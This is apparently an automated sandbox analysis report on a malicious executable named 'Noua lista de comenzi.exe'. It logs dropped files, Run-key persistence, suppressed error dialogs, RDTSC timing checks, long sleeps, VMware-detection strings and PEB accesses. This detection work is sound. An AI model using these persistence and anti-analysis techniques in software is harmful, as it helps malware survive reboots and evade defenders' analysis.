          Source: Binary string: systray.pdb source: DpiScaling.exe, 0000000D.00000002.443630865.0000000000650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: DpiScaling.exe, 0000000D.00000002.443630865.0000000000650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 0000000D.00000002.445684941.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, DpiScaling.exe, 0000000D.00000002.447244201.00000000046FF000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.811879967.0000000004490000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812401712.00000000045AF000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.477462244.0000000004A3F000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.475842271.0000000004920000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000019.00000002.481489671.0000000004A40000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DpiScaling.exe, DpiScaling.exe, 0000000D.00000002.445684941.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, DpiScaling.exe, 0000000D.00000002.447244201.00000000046FF000.00000040.00000800.00020000.00000000.sdmp, systray.exe, systray.exe, 00000014.00000002.811879967.0000000004490000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812401712.00000000045AF000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.477462244.0000000004A3F000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.475842271.0000000004920000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000019.00000002.481489671.0000000004A40000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: DpiScaling.pdb source: systray.exe, 00000014.00000002.810319814.0000000000193000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812850284.0000000004AE7000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: DpiScaling.pdbGCTL source: systray.exe, 00000014.00000002.810319814.0000000000193000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812850284.0000000004AE7000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0465D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0450D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5C8CF pushad ; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5B88C push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5B03A push es; retf
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5B822 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5B82B push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D5B7D5 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D55F80 push ebx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_02D55C0F push edx; ret
          Source: 6ld01n28q8c.exe.14.drStatic PE information: 0x8BD20D94 [Mon May 2 10:51:00 2044 UTC]
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Fg00t0t5x\6ld01n28q8c.exeJump to dropped file
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeFile created: C:\Users\user\Contacts\Tdfgwnfyyv.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TdfgwnfyyvJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AHLTIJ3XPTFXJump to behavior
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TdfgwnfyyvJump to behavior
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TdfgwnfyyvJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AHLTIJ3XPTFXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AHLTIJ3XPTFXJump to behavior
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000002D48604 second address: 0000000002D4860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000002D4899E second address: 0000000002D489A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\logagent.exeRDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\logagent.exeRDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 3012Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 5080Thread sleep count: 41 > 30
          Source: C:\Windows\SysWOW64\systray.exe TID: 5080Thread sleep time: -82000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04646DE6 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeAPI coverage: 6.0 %
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess information queried: ProcessInformation
          Source: explorer.exe, 0000000E.00000000.404715373.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000000.410296723.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000000.357539802.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 0000000E.00000000.351243805.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000000.410296723.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 0000000E.00000000.351243805.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 0000000E.00000000.388516534.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA
          Source: explorer.exe, 0000000E.00000000.410296723.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04646DE6 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0469C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0469C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04643D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04683540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04627D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0468A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04638E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04648EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0469FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04604F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04604F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0469FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0469FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04618794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04620050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04620050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04687016 mov eax, dword ptr fs:[00000030h]
